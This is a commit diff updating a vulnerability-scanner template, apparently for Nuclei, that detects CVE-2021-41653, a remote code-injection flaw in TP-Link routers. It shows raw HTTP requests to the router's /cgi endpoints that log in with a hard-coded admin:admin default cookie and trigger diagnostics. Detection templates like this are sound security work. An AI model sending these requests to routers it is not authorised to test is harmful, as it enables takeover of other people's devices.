Update CVE-2021-41653.yaml

patch-1
Prince Chaddha 2021-11-30 22:22:16 +05:30 committed by GitHub
parent 3dd0c78fff
commit 0b82e570d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 7 deletions

View File

@ -8,21 +8,18 @@ info:
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
tags: cve,cve2021,tplink,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-41653
cwe-id: CWE-94
tags: cve,cve2021,tplink,rce,router
requests:
- raw:
- |
POST /cgi?2 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/plain
Referer: http://{{Hostname}}/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
@ -35,11 +32,9 @@ requests:
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
- |
POST /cgi?7 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/plain
Referer: http://{{Hostname}}/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=